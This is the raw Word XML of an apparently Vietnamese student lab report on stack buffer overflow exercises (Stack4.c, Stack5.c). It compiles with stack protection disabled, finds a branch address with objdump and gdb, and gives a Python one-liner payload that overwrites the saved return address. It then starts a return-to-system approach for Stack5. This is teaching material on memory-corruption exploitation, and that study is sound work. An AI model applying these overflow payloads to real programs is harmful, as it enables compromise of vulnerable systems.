          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029E15DF" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8835E4" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768E7DE1" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D548E18" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B46EB51" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED50437" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2879C6F4" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BAE1FF" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E54478" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5D4572" w14:textId="5E92D517" w:rsidR="00BA2CC9" w:rsidRDefault="00285EEF" w:rsidP="00EF2828">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc164791216"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bài </w:t>
      </w:r>
      <w:r w:rsidR="00EF2828">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>4: Stack4.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="3162E65D" w14:textId="1D2CA53F" w:rsidR="00BA2CC9" w:rsidRDefault="00BA2CC9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- Stack4.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718DDB61" w14:textId="0B47FA17" w:rsidR="00285EEF" w:rsidRDefault="007042C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007042C7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="635203AB" wp14:editId="255B430C">
            <wp:extent cx="5943600" cy="3368675"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="5950304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30451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B32" w14:textId="31C3C1AF" w:rsidR="00BA2CC9" w:rsidRDefault="00EC0731">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>gets() đọc một dòngtừ bộ nhập chuẩn vào bộ đệm được trỏ đến bởi s cho đến khi gặp phải một</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ký tự dòng mới hoặc EOF, và các ký tự này được thay bằng ’\0’.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ý tự dòng mới có mã ASCII là 0A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Ghi gặp ký tự này, gets sẽ ngừng việc nhận dữ liệu và thay ký tự này bằng ký</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>tự có mã ASCII 0 (ký tự kết thúc chuỗi).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114BAA13" w14:textId="58392865" w:rsidR="00006510" w:rsidRDefault="00006510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23CF8AFA" wp14:editId="5D217E79">
            <wp:extent cx="2982184" cy="3185160"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="21313995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99516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380" cy="31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7F56" w14:textId="25D2258C" w:rsidR="00006510" w:rsidRDefault="00006510" w:rsidP="00006510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vì không thể rẽ vào nhánh “bằng” nên chương trình của chúng ta sẽ luôn đi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>theo nhánh “không”, và sẽ đi tới phần “kết thúc” của hàm main.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A76C105" w14:textId="6E735CA9" w:rsidR="00006510" w:rsidRDefault="00006510" w:rsidP="00006510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>tìm địa chỉ nhánh “bằng” trong chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8E63BC" w14:textId="3DEA20AE" w:rsidR="00BA2CC9" w:rsidRPr="00BA2CC9" w:rsidRDefault="00BA2CC9" w:rsidP="00BA2CC9">
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- Biên dịch chương trình: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA2CC9">
        <w:t>gcc -fno-stack-protector -mpreferred-stack-boundary=2 -m32 stack4.c -g -o stack4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350E9A71" w14:textId="4395273F" w:rsidR="00BA2CC9" w:rsidRDefault="00BA2CC9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="533C7085" w14:textId="328D8A94" w:rsidR="00285EEF" w:rsidRDefault="00163879">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00163879">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B0A2E52" wp14:editId="43190D61">
            <wp:extent cx="5943600" cy="1869440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="113954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57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2953" w14:textId="77777777" w:rsidR="00EC0731" w:rsidRDefault="00EC0731">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E2297B" w14:textId="1361CCE1" w:rsidR="00163879" w:rsidRDefault="00EC0731">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- Sử dụng objdump: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>objdump -d ./stack4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DEA11C" w14:textId="12FD80D9" w:rsidR="00163879" w:rsidRDefault="00163879">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00163879">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2244BB9B" wp14:editId="0D8FB6E5">
            <wp:extent cx="4520960" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1819288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85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2270" cy="25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4B93" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D12C12" w14:textId="4CC5FBFF" w:rsidR="00625334" w:rsidRDefault="00EC0731">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- Sử dụng gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29609680" w14:textId="472B9B31" w:rsidR="00625334" w:rsidRDefault="00625334">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00625334">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EED8D60" wp14:editId="3466D007">
            <wp:extent cx="4587240" cy="4269661"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="6027835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3504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682" cy="42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7525" w14:textId="77777777" w:rsidR="00625334" w:rsidRDefault="00625334">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F5DA0E" w14:textId="20372A9F" w:rsidR="00625334" w:rsidRDefault="00006510" w:rsidP="00006510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ta sẽ cần tìm tới nhánh có chứa lời gọi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">hàm printf thứ hai. Tại địa chỉ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>080484A8</w:t>
      </w:r>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> là lời gọi hàm printf thứ hai do đó</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>nhánh “bằng” chính là nhánh có chứa địa chỉ này. Một vài dòng lệnh phía trên</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>lời gọi hàm là một lệnh nhảy có điều kiện JNE, đánh dấu sự rẽ nhánh. Đích</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>đến của lệnh nhảy này là một nhánh, và phần phía sau lệnh nhảy là một nhánh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>khác. Vì phần phía sau lệnh nhảy có chứa lời gọi hàm ta đang xét nên nhánh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">“bằng” bắt đầu từ địa chỉ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>080484A3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4126BEC5" w14:textId="7655FD01" w:rsidR="00006510" w:rsidRDefault="00006510" w:rsidP="00006510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">tìm được địa chỉ của nhánh“bằng” bắt đầu từ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>080484A3</w:t>
      </w:r>
      <w:r w:rsidRPr="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521833BE" w14:textId="1634FD6B" w:rsidR="00625334" w:rsidRDefault="00625334">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00625334">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09EAB16A" wp14:editId="59394A1D">
            <wp:extent cx="5680712" cy="3718560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12953962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962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2324" cy="37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D0F" w14:textId="1725B2E6" w:rsidR="00EC0731" w:rsidRPr="00EC0731" w:rsidRDefault="00EC0731" w:rsidP="00EC0731">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Lấp đầy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r w:rsidR="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0358A8BC" w14:textId="76B8C506" w:rsidR="00EC0731" w:rsidRPr="00EC0731" w:rsidRDefault="00EC0731" w:rsidP="00EC0731">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Lấp đầy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4DF76E" w14:textId="6410BE6E" w:rsidR="00EC0731" w:rsidRPr="00EC0731" w:rsidRDefault="00EC0731" w:rsidP="00EC0731">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Lấp đầy ebp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>cũ</w:t>
      </w:r>
      <w:r w:rsidR="00006510">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D243B65" w14:textId="34F9E20E" w:rsidR="00EC0731" w:rsidRDefault="00EC0731" w:rsidP="00EC0731">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Ghi đè lên ô nhớ lưu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>trữ EIP cũ với giá trị địa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0731">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>chỉ của nhánh bằng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C4AFB3" w14:textId="3AF47530" w:rsidR="00EC0731" w:rsidRPr="00EC0731" w:rsidRDefault="00EC0731" w:rsidP="00EC0731">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0731">
        <w:t>python -c 'print("a"*0x18 + "\xa3\x84\x04\x08")' | ./stack4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D840DF" w14:textId="77777777" w:rsidR="00EC0731" w:rsidRDefault="00625334">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00625334">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="529B7E72" wp14:editId="69F92FEF">
            <wp:extent cx="5943600" cy="2513965"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1327366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663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3A59" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828" w:rsidP="00EF2828">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258E470B" w14:textId="16D86BF4" w:rsidR="009E32D6" w:rsidRDefault="007042C7" w:rsidP="00EF2828">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc164791217"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bài </w:t>
      </w:r>
      <w:r w:rsidR="00EF2828">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>5: Stack5.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="494D8FEC" w14:textId="2E6EB8AA" w:rsidR="007042C7" w:rsidRDefault="00006510">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- Stack5.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240169D2" w14:textId="5677A76E" w:rsidR="007042C7" w:rsidRDefault="007042C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007042C7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="475EFD6E" wp14:editId="2094C3B5">
            <wp:extent cx="5943600" cy="3439160"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="15950817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1739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8679" w14:textId="320496BA" w:rsidR="00BF60F7" w:rsidRPr="00BF60F7" w:rsidRDefault="00006510" w:rsidP="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- Biên dịch chương trình: </w:t>
      </w:r>
      <w:r w:rsidR="00BF60F7" w:rsidRPr="00BF60F7">
        <w:t xml:space="preserve">gcc -fno-stack-protector -mpreferred-stack-boundary=2 -m32 </w:t>
      </w:r>
      <w:r w:rsidR="00BF60F7">
        <w:t>stack5</w:t>
      </w:r>
      <w:r w:rsidR="00BF60F7" w:rsidRPr="00BF60F7">
        <w:t xml:space="preserve">.c -g -o </w:t>
      </w:r>
      <w:r w:rsidR="00BF60F7">
        <w:t>stack5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A4C697" w14:textId="4A06B423" w:rsidR="007042C7" w:rsidRDefault="007042C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA22DB6" w14:textId="2F9D93E4" w:rsidR="007042C7" w:rsidRDefault="007042C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007042C7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B3F6C7E" wp14:editId="2F36435D">
            <wp:extent cx="5943600" cy="1986280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="364340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075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F6A8" w14:textId="77777777" w:rsidR="00BF60F7" w:rsidRDefault="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B29C68A" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C2FC56" w14:textId="77777777" w:rsidR="00EF2828" w:rsidRDefault="00EF2828">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3ABDA6" w14:textId="3B571994" w:rsidR="007042C7" w:rsidRDefault="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Thực thi chương trình theo cách giải stack4.c</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7336A2BE" w14:textId="2AF4D4D9" w:rsidR="007042C7" w:rsidRDefault="007042C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007042C7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D965D34" wp14:editId="2170A72F">
            <wp:extent cx="5943600" cy="2025650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1006472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2342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AA0C" w14:textId="0E459392" w:rsidR="002E6BD8" w:rsidRDefault="00BF60F7" w:rsidP="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Cần truyền biến “You win!” vào chương trình, sau đó gọi hàm print với chuỗi “You win!” làm tham số đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6791DBEC" w14:textId="408038CB" w:rsidR="00BF60F7" w:rsidRDefault="00BF60F7" w:rsidP="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Quay về hàm system vì không thể dùng printf</w:t>
      </w:r>
    </w:p>
